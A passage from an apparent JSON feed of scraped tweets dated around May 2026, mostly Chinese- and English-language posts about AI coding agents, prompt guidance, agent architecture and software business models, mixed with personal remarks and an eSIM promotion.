的习惯是\"手把手教\":先做A,再做B,然后比较C。\n\n现在 OpenAI 官方的建议是:描述终点,而不是规定路线。\n\n几个值得注意的点:\n\n1. Outcome-First(结果导向):\n\n不要写一堆步骤让模型按顺序执行,而是描述\"成功是什么样的\",让模型自己决定怎么走。翻译成人话:以前是写\nSOP,现在是写验收标准。\n\n2. 停止条件(Stopping Conditions):\n\n给模型加一个明确的\"能不能回答了?\"的判断规则,防止它无限循环地查资料、做推理。这个在 Agent\n场景下尤其重要——很多 Agent 跑飞了就是因为没有好的停止条件。\n\n3. 自我检查(Self-Checking):\n\n写完代码跑测试、做完 UI 截图看一眼、做计划要可追溯。这不就是软件工程的基本功吗?\n\n4. 搜索预算(Grounding):\n\n给模型设定搜索的\"停止规则\"——搜到能回答问题的信息就停,别为了润色措辞再去搜一轮。\n\n5. 创意内容和事实分开:\n\n检索到的事实用来支撑具体的数据和声明,创意部分不要编造具体数字和指标。\n\n这份指南还提到了一个 text.verbosity 参数,可以控制输出的详细程度,默认是 medium,设成 low 可以让输出更简洁。做 API 开发的可以关注一下。\n\n说说我的看法:\n\n这份指南看着在讲 Prompt 技巧,底下的逻辑其实是 Harness Engineering。停止条件、验证循环、搜索预算,这些都不是 Prompt本身的问题,而是围绕模型的工程系统设计。\n\n另一个有意思的转变:\n以前写 Prompt 像写代码,要精确控制每一步;现在更像写需求文档,描述清楚\"要什么\"和\"什么算完成\"就行。这和 Agentic Engineering的大方向是一致的——你不需要控制 Agent 的每一步,而是设定好目标和边界。\n\n不过有一点要注意:这份指南是针对 GPT-5.5 的。不同模型对 Prompt 风格的偏好不一样,Claude 和 GPT 在这方面会有明显差异。", + "url": "https://x.com/Pluvio9yte/status/2050118179062743418", + "published_at": "2026-05-01T07:40:37+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。\n\n推荐一下插件和自动化,很上头。", + "url": "https://x.com/frxiaobei/status/2050116811769954778", + "published_at": "2026-05-01T07:35:11+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md\n\nhttps://styles.refero.design/", + "url": "https://x.com/dingyi/status/2050109458957947150", + "published_at": "2026-05-01T07:05:58+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "小米之家河南限定五一礼物钧瓷已拿到\n还送了水和王者明信片,汝窑会更好看,天青色\n\n对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷\n不知道为啥换名字了\n\n青花瓷是靛蓝或者宝石蓝,不是天青色", + "url": "https://x.com/realNyarime/status/2050108592246984780", + "published_at": "2026-05-01T07:02:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "跟推友问好👋\n\n有一个问题想问大家🙋\n\n放假都没出去,看了一圈好像没什么好玩的地方🤔\n\n所以想问问,有什么值得两人旅行的地方?😳", + "url": "https://x.com/realNyarime/status/2050101082433720730", + "published_at": "2026-05-01T06:32:41+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。\n\n1. Software 3.0 来了。\n1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。\n\n2. 2025-12 是拐点。\n生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。\n\n3. 神经网络会成主计算层。\n未来不是 CPU 上跑神经网络,是神经网络当主进程,传统计算变辅助。\n\n4. 许多应用会消失。\n用户不需应用,直接拿模型输出。MenuGen 那种轻量工具最先被替代。\n\n5. 验证性决定进展速度。\n数学、代码这种可结算的领域 AI 飞快。模糊任务仍是\"锯齿智能\"。\n\n6. 新的 10x 工程师不是会写代码的人。\n是会做这五件事的人——\n\n规范 / 监督 / 审查 / 评估 / 权限管理。\n\n没一件是写代码本身。\n\n7. 它们是鬼,不是动物。\nLLM 是统计模拟物,盲信和盲拒都不对,要实证理解它的边界。\n\n最强金句:\n\n> 你可以外包思考。\n> 但不能外包理解。\n\n---\n\n跑了半年策略,第 6 条最有体感。\n\n写新策略丢 prompt 给 Claude Code 就有了。\n真正花时间的是规范怎么写、跑出来怎么审、上线前权限怎么收。\n\n代码量从 0 到 1 的那段不再是瓶颈。\n从 1 到能信任的那段才是。\n\n---\n\n鬼,不是动物。\n盲信和盲拒都不对。", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "published_at": "2026-05-01T06:14:26+00:00", + "source": "nitter", + "title_zh": "专家强调LLM本质为统计模型,需通过安全边界测试验证其可靠性,开发决策中平衡模型应用与人类认知边界" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "硅谷101 这期 DeepSeek,我反复看了 3 遍\n\n陈茜也转发了我的推文\n\n3 个细节没人注意到,但对我们做出海/独立开发的影响最大:\n\n1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+\n\n出海产品从来不是\"等团队够大\",是\"敢做\"\n\n我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗\n\n2️⃣ 幻方 7 年量化背景,把\"模型上线 → A/B → 不行就删\"做成了肌肉记忆\n\n3 周一次大版本,迭代速度是 OpenAI 的 3 倍\n\n独立开发者天然就该这么干,但 90% 的人在第 2 周就开始打磨 UI 细节,全错\n\n3️⃣ 梁文锋几乎 0 媒体露面、0 KOL 投放\n\n靠的是产品 → 用户口碑 → X 自传播\n\n我基本每天起码保持日更,维持手感,\"做不出爆款是因为没渠道\" 是骗自己", + "url": "https://x.com/GoSailGlobal/status/2050092401004564952", + "published_at": "2026-05-01T05:58:11+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了", + "url": "https://x.com/bozhou_ai/status/2050092103565496369", + "published_at": "2026-05-01T05:57:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "避雷一下中国电信英国(CTExcel UK)\n虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制\n头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣", + "url": "https://x.com/realNyarime/status/2050088491925815667", + "published_at": "2026-05-01T05:42:39+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks", + "url": "https://x.com/paulg/status/2050084092402688337", + "published_at": "2026-05-01T05:25:11+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974561199…", + "url": "https://x.com/GoSailGlobal/status/2050076357296824737", + "published_at": "2026-05-01T04:54:26+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "今天看了 @GabiExplores 的两个项目:\n\nstitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台\n\nslopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测论文\n\n工程量:扎实。GitHub stars 加起来 24,X 关注 4。\n\n同期对比:obra/superpowers 173K,garrytan/gstack 86K,mattpocock 42K。\n\n差 1700-7000 倍。差距不是质量,是 distribution。\n\n蓝皮书 Ch3 「shipping easy, distribution hard」每天都在被印证:https://github.com/zhuyansen/skill-blue-book/blob/main/part1-foundation/ch03-market-landscape.md\n\n🔗 http://github.com/gabelul/stitch-kit\n🔗 http://github.com/gabelul/slopbuster", + "url": "https://x.com/GoSailGlobal/status/2050075607707586658", + "published_at": "2026-05-01T04:51:28+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "⏺ Sam Altman 这段话说得挺实在的:AI 的下一个大突破不是某个具体领域,而是人们意识到自己每天在电脑上浪费了多少时间。\n\n简单说,大家以为 AI 的价值是\"帮你把某件事做得更好\",但 Altman认为真正的价值是\"帮你省掉那些根本不该做的事\"——在应用之间切换、复制粘贴、处理各种数字杂务。这些摩擦看着不起眼,但确实在不断打断心流。\n\n这个观点我是认同的。说说自己的体验:\n\n1. 以前写一篇翻译稿,光是在浏览器、编辑器、翻译工具之间来回切换就要耗掉不少精力。现在直接在 Claude Code 里一条龙搞定,中间那些摩擦几乎消失了。\n2. 以前整理一个项目的技术文档,要打开十几个文件逐个看。现在让 Agent 自己去读代码、生成文档,我只负责审核。\n\n这些不是什么\"颠覆性\"的变化,但每天确实能省出不少心流时间。\n\n不过有一点要注意:Altman 说\"大多数人可以放松下来看着 AI完成枯燥工作\",这个对程序员和重度工具用户来说已经在发生了,但对很多传统行业的人来说,光是\"怎么把工作交给 AI\"这件事本身就是一个不小的学习成本。\n\n翻译成人话:不是 AI 不够强,是大多数人的工作流还没有为 AI 准备好。这其实就是 Harness的问题——模型能力到了,但围绕模型的工作环境(工具链、权限、数据接入)还没跟上。\n\n所以 Altman 这个判断方向是对的,但真正落地可能比他说的要慢一些。至少目前,能真正享受到\"心流不被打断\"的,还是少数已经把 AI 深度嵌入工作流的人。", + "url": "https://x.com/Pluvio9yte/status/2050072657618772226", + "published_at": "2026-05-01T04:39:44+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "我艹!这一波Codex+GPT2 真是成了!\n直接可以来开发游戏了,而且只是用嘴!\n\n一句话就可以搞起来,完整教程看藏师傅的教程👇", + "url": "https://x.com/berryxia/status/2050070823256654283", + "published_at": "2026-05-01T04:32:27+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "假新闻、任何虚假的东西,总是能获得更多关注。这对吗?", + "url": "https://x.com/dingyi/status/2050065962855182350", + "published_at": "2026-05-01T04:13:08+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Anthropic这个BioMysteryBench直接把我对AI在硬核科学领域真实能力的认知彻底刷新了🤯\n\n不是测评玩具benchmark,他们直接把Claude扔进99个来自真实研究的烂摊子生物信息学难题:原始DNA序列、临床样本那种messy到爆炸的数据,连PhD学生都要熬夜啃的开放谜题。\n\n结果呢?5个领域专家都搞不定的23个硬骨头,Claude Mythos Preview直接干掉了约30%,剩下大部分也拿下。Genentech和Roche自己跑的CompBioBench也印证了,Claude Opus 4.6整体准确率冲到81%……\n\n这已经不是“助手”了,这是真正的科研force multiplier,甚至开始在最硬核的问题上把人类专家甩开。\n\n它是怎么做到的?通过跨海量论文的知识储备 + 多重分析策略并行,相当于把一屋子顶尖专家的脑力一次性打包输出。\n\n这波操作意味着生物医药研究的范式要变天了。未来突破的节奏会大幅加速,研究者可能更多转向hypothesis curation、品味判断和实验设计,而AI来扛heavy lifting的data crunching和pattern finding。\n\n最关键的护城河,变成了你能不能设计出高效的人机协同agent系统,能不能在AI的锯齿智能里守住人类独有的那点“taste”", + "url": "https://x.com/Pluvio9yte/status/2050063821377810451", + "published_at": "2026-05-01T04:04:38+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "卧槽,看完 Andrej Karpathy 在 Sequoia AI Ascent 2026 的最新访谈,我直接破防了🤯\n\n他说:最近几个月,他作为程序员从来没有感觉这么“behind”过……不,是突然之间,他发现自己再也不落后了。12月前后,agentic tools 突然从“偶尔靠谱”变成了“离谱地靠谱”。\n\nKarpathy说了三个阶段:\nSoftware 1.0:你写显式规则\nSoftware 2.0:你调数据+训练网络\nSoftware 3.0:你给 Context + Prompt,让 LLM 自己去当那个智能解释器\n\n举两个他亲身实验的狠例子:\nOpenClaw 安装:以前是写一堆复杂 shell script 去适配各种平台。现在?直接扔一句 prompt 给 agent,它自己看环境、debug、搞定全部。你编程的对象从“代码”变成了“一段描述”。\n\nMenu Gen:以前他还老老实实写 Vercel App、OCR、调用图像生成器……结果 Gemini 直接吃照片、用 prompt 就把菜单重绘+图片叠加上去了。整个 App 都没必要存在了!\n\n他还区分了两个词:\nVibe Coding:把地板拉高,所有人都能随便搞东西,太爽了\nAgentic Engineering:把天花板继续拔高,专业软件的质量不能因为“vibe”而掉,你得学会 harness 这些技能,让它们又快又稳\n\nAI 加快了技术平权,编程从职业开始变成每个人都能拥有的超级能力。", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "published_at": "2026-05-01T03:47:55+00:00", + "source": "nitter", + "title_zh": "Karpathy预测2025年12月为AI编程拐点,具备验证性的业务场景将加速应用消失,催生新型工程师人才需求" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Customer service in the age of AI has been become truly horrible. Excruciatingly bad.", + "url": "https://x.com/GaryMarcus/status/2050058685531983988", + "published_at": "2026-05-01T03:44:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t let me change delivery options, and I literally cannot reach a human. \n\nYou have simply held an important package without delivering it or giving me any recourse. You might as well have stolen it.\n\nF-. \n\nSecond time in two weeks, this time worse than first.", + "url": "https://x.com/GaryMarcus/status/2050057004862103767", + "published_at": "2026-05-01T03:37:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这种平台有点意思,也见过好几个同类型的了。\n互动加热的平台其实很大程度上依赖宣传和用户自传播。\n见过两个逐渐杳无音讯的,目前唯一做起来的就是灯塔,看看这个平台会怎么样", + "url": "https://x.com/Pluvio9yte/status/2050053813802090671", + "published_at": "2026-05-01T03:24:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "Computer plays the orchestra", + "url": "https://x.com/AravSrinivas/status/2050053128452456584", + "published_at": "2026-05-01T03:22:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs.\n\nSo the question becomes what is the business model of software and this headless approach in the future?\n\nHere are a few thoughts on how everything plays out based on what we’re seeing and doing at Box, but also conversation with other platforms.\n\n1) Seats don’t go away for *people*. Seats are still a convenient and efficient way to have a customer use technology predictably for a set of users within a baseline set of usage. The key, though, is that when the customer pays for a seat, it has to come with a set of usage of APIs on behalf of that user that the agent can use on their behalf. \n\nThe user will need to be able to interact with their data and the underlying tool via any agent they work with, and an embedded amount of usage will come with the seat. I would imagine most software -Box included- will enable seats to work with their data at a relatively high volume via systems like ChatGPT, Codex, Claude, Gemini, Cursor, Copilot, Perplexity, Factory, Cogniton, et al. quite seamlessly. If you don’t do this, you’re DOA.\n\n2) Agents may have “seats” if they are doing stateful work in the system, but they will be priced very differently than people. Seats (or the equivalent) can make sense when you have an agent that has its own workspace, stores its own data, needs a different set of permissions compared to the user, and so on. \n\nIf a company wants this agent to be around for long period of time, that may very well look like another “user” in the system. Openclaw-style agents highlight what this future could look like. \n\nThe only issue on pricing here is that one customer could decide to do all their work in 1 agent, and another might split it into 1,000 agents. So pricing like a human seat is nearly impossible and impractical; each company will have a different approach for this as it gets tricky perfectly trying to capture all the value within an agent seat.\n\n3) The dominant pricing for headless use that goes above the seat allotment, or when an agent is firmly acting on their own, will be a consumption model. Many enterprises software platforms have previously operated like this with PaaS options, and agents will look like another machine user of their system. \n\nIn some cases the APIs might get priced just as they did previously, but in other cases there may need to be new types of APIs that represent the work an agent would do in one go -more akin to an outcome- instead of a series of API calls. This is especially germane when the headless software also has an agentic use-case embedded within in, such as orchestrating the process within their own system via AI.\n\nOverall the growth of this usage pattern is effectively unbounded as the use-cases for agents operating on data in these systems will dramatically exceed what people do with their data and tools today. Every platform that goes headless (which will be anyone that wants to take advantage of agents) will need to adopt a model like this. Some may fight it initially but it’s an inevitably as there will always be more and more agents outside your platform than people.\n\nOverall, there’s a lot of really interesting changes left to come in software due to headless use of these systems. Early days.", + "url": "https://x.com/paulg/status/2050051426446152159", + "published_at": "2026-05-01T03:15:22+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.", + "url": "https://x.com/GaryMarcus/status/2050050604915888484", + "published_at": "2026-05-01T03:12:06+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "🤔赚钱 -> 美股,长持复利\n\n2月开始关注上英特尔的,后面又加仓\n\n陈立武真是英特尔的福星", + "url": "https://x.com/GoSailGlobal/status/2050049784094855501", + "published_at": "2026-05-01T03:08:51+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "Video", + "url": "https://x.com/AravSrinivas/status/2050048790908785072", + "published_at": "2026-05-01T03:04:54+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "至于说eSIM太贵,如果愿意折腾也可以省钱。分享一期中国大陆5天无限流量(每天5G高速)仅需25THB约5.24CNY\n先领取优惠👇🏻\nhttps://s.ee/superalink\n再购买中国大陆套餐👇🏻\nhttps://s.ee/superalinkcn\n这里需要右上角改成THB(泰铢),语言还是保持中文。确定支付金额是否为:25泰铢,约5.24CNY,如果你发现价格不对,请回到第一个链接领取优惠\n\n确保兼容性,点击:开启,输入优惠码:输入NYARI0001(默认会显示),输入你的邮箱,用于接收eSIM二维码,选择支付方式,点击:立即支付。打开邮件,用支持eSIM设备或手机扫描这个二维码即可把eSIM添加到手机,每个号一次,就是需要一周换一次达量限速\n如果你的手机不支持eSIM,也可以买一张eSTK,使用优惠码naixi可以打9折👇🏻\nhttps://s.ee/estk\n\n作为主推eSIM的小博主,我承认外卡并不安全,尤其是串号(IMEI)锁定使用者,以及GTP协议明文传输\n显然境外电话卡只是帮你回源到原运营商,协助你出GFW,要想流量不被看出来那就得套VPN\n\n比如买一张香港出口的eSIM,在这基础上叠加CF WARP、iCloud Privacy Relay、VPN Gate等VPN,多损失10%的流量用于加密。你会发现TopCashback买的返120%的NordVPN、Surfshark VPN都能用了,这是因为你漫游回境外,就跟出国使用VPN无异(在国外,VPN一般用于流媒体解锁,如在MY看SG的网飞", + "url": "https://x.com/realNyarime/status/2050047591191384162", + "published_at": "2026-05-01T03:00:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Get @WisprFlow and the @elgato foot pedal — it’s life changing", + "url": "https://x.com/jason/status/2050042395111088463", + "published_at": "2026-05-01T02:39:29+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "老奶奶 vibe 大法果然好用。", + "url": "https://x.com/dingyi/status/2050035236487172404", + "published_at": "2026-05-01T02:11:02+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "artificial goblin intelligence\n\nachieved", + "url": "https://x.com/sama/status/2050021650641695108", + "published_at": "2026-05-01T01:17:03+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?", + "url": "https://x.com/GaryMarcus/status/2050020685733564459", + "published_at": "2026-05-01T01:13:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Most evil person in AI", + "url": "https://x.com/GaryMarcus/status/2050020164612104604", + "published_at": "2026-05-01T01:11:09+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Once again IP thieves accusing other IP thieves of IP thievery! \n\nThe nerve!", + "url": "https://x.com/GaryMarcus/status/2050019713409814672", + "published_at": "2026-05-01T01:09:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "😂😂😂@ATLHawks", + "url": "https://x.com/jason/status/2050018446616797370", + "published_at": "2026-05-01T01:04:19+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Dario at Anthropic has such a hard job predicting compute demands?\n\n\"The stakes are enormous and the margin for error is tiny.\n\nFor every dollar of revenue, you may need $4–5 in upfront compute investment.\n\nIf you underinvest, you cannot meet demand. If you overinvest, you are left with massive stranded capacity.\n\nGetting that balance right, years in advance, is incredibly hard.\" @rodriscoll\n\nLove to hear your thoughts @AnjneyMidha @JonathanRoss321 @mmurph @YasminRazavi @andrewdfeldman", + "url": "https://x.com/HarryStebbings/status/2050016099606118504", + "published_at": "2026-05-01T00:55:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/", + "url": "https://x.com/berryxia/status/2050015406140903487", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层!\n@Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能!\n\n1. 从文本/平面图直接生成精准 BREP CAD 模型\n2. Three.js 实时渲染 + Google AI 驱动,全流程端到端\n3.完整开源可用", + "url": "https://x.com/berryxia/status/2050015402647027808", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: I think the expression is “pulling the ladder”! All labs trained their models by distilling (at the very least distilling the web) which allowed them to become the fastest growing businesses in the history of humanity and now that they have armies of lawyers and lobbyists, they are trying to prevent others from doing the same thing.", + "url": "https://x.com/ylecun/status/2050013015680995631", + "published_at": "2026-05-01T00:42:44+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "No comment", + "url": "https://x.com/jason/status/2050011874989649946", + "published_at": "2026-05-01T00:38:13+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Whoever is running the hawks social is a savage 😂", + "url": "https://x.com/jason/status/2050011821914865685", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "38k 星的 skill 仓库。\n\n上周抄了 1 个 grill-me,今天又加了另外 2 个。\n\n一个是 /tdd 思路。\n\n动手前先写一行——跑完应该长啥样。\n对得上才往下走。\n\n加进自己的自检流程,只用于策略代码或 API 调用那类——\n跑了对不对要 grep log 才知道的场景。\n\nskill 没装,精华抄过来了。\n\n另一个是他 SKILL.md 的渐进式骨架。\n照着写了个模板,下次新写 skill 直接套。\n\n剩下 13 件翻了一遍,没一件用得上——\n他全围绕代码工程,我这边的栈错位太大。\n\n差别挺有意思:\n\n他走工程师纯度路线,16 个 skill 全围绕代码。\n我这边是独立构建者全栈,skill 涵盖内容、量化、视频、社群。\n\n两套都对,服务不同的人。\n\n试试今晚 grep 一下 .claude/skills/,\n看哪些真在用、哪些只是占着位置 👀", + "url": "https://x.com/runes_leo/status/2050011821352829116", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Tokenmaxxing is stupid. \n\nChange my mind?", + "url": "https://x.com/GaryMarcus/status/2050009144846119068", + "published_at": "2026-05-01T00:27:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Image", + "url": "https://x.com/jason/status/2050009016105930837", + "published_at": "2026-05-01T00:26:51+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "THIS IS INSANE 🔥\n\nPURE DOMINATION 🤦\n\nATL DOES HAVE SOME GREAT RAPPERS 😂😂😂", + "url": "https://x.com/jason/status/2050007416964591880", + "published_at": "2026-05-01T00:20:30+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "OpenRouter 又上了匿名新模型Owl Alpha!\n\n 1M 上下文,强大的工具调用能力!\n猜猜他是谁家的哈哈😂", + "url": "https://x.com/berryxia/status/2050004383971282952", + "published_at": "2026-05-01T00:08:27+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!老马家的Grok Image终于……\n\nGrok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中!\n\n这是一款全能创意Agent,可在无限开放画布上独立创作。\n\nGrok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。\n\n只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代:\n\n• 🎬 “生成一部 1 分钟电影级短片”\n\n• 📚 “创作一整套漫画”\n\n• 🛍️ “制作用户生成内容(UGC)产品故事”\n\n这是从简单提示词到端到端创意制作的真正飞跃。\n\n这是 Grok Imagine 迄今为止最重大的升级。", + "url": "https://x.com/berryxia/status/2050002308759695561", + "published_at": "2026-05-01T00:00:12+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。\n\n设定任务与目标\n\n明确你希望AI智能体需要完成、达成的具体事项。\n\n1. 编排层 Orchestration layer\n相当于整套系统的控制面板,负责全局调度与流程统筹。\n\n2. 智能体层 Agents layer\n由多个专用/通用智能体组成,也就是多智能体分工协作架构。\n\n3. 工具层 Tools\n为智能体提供各类能力支撑,例如网页搜索、数据库查询、第三方API调用等。\n\n4. 记忆层 Memory\n系统的“大脑”,负责存储短期记忆与长期记忆等各类信息。\n\n5. 监控层 Monitoring\n至关重要的一环,用来实时追踪智能体执行的每一个步骤。\n\n6. 可靠性与故障管理 Reliability & failure management\n自动识别错误、执行重试、设置降级兜底策略,并支持人工介入处理。\n\n7. 治理与安全 Governance and security\n包含合规校验、行为审计、身份授权、数据安全等管控机制。", + "url": "https://x.com/berryxia/status/2050001371307646977", + "published_at": "2026-04-30T23:56:28+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊!\n\n目前已经内置于网页版的 Claude Code 中。\n\n只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们!\n\n这个功能挺实用,什么时候可以直接cc里可以用。\n\n地址:https://claude.com/product/claude-security", + "url": "https://x.com/berryxia/status/2049998972484567491", + "published_at": "2026-04-30T23:46:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "你看看大模型有多重?\n这个挺有意思的😂", + "url": "https://x.com/berryxia/status/2049997574229446812", + "published_at": "2026-04-30T23:41:23+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Claude& Blender 🐮🍺", + "url": "https://x.com/berryxia/status/2049995723580850235", + "published_at": "2026-04-30T23:34:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Very quiet @ATLHawks 🤫", + "url": "https://x.com/jason/status/2049994885185384483", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "2026年你必须了解的6个大语言模型(LLM)知识库专业术语!\n\n(大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价)\n\n1. LLM Knowledge Base 大语言模型知识库\n\n一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。\n\n2. Continuous Ingestion 持续数据摄取\n\n自动从所有日常工作工具中同步信息,包括即时通讯软件、客户关系管理系统、会议记录、文档资料等,全程无需人工维护数据链路。个人知识库一般抓取互联网信息,而团队知识库则必须同步企业内部数据。\n\n3. Source Trust 来源可信度分级\n\n并非所有信息都具备同等价值。来源可信度可以帮助AI代理和人类区分官方已定决策与聊天记录中的个人观点。如果缺失这项能力,所有文档权重完全一致,最终会导致所有信息都失去参考意义。\n\n4. Freshness Monitoring 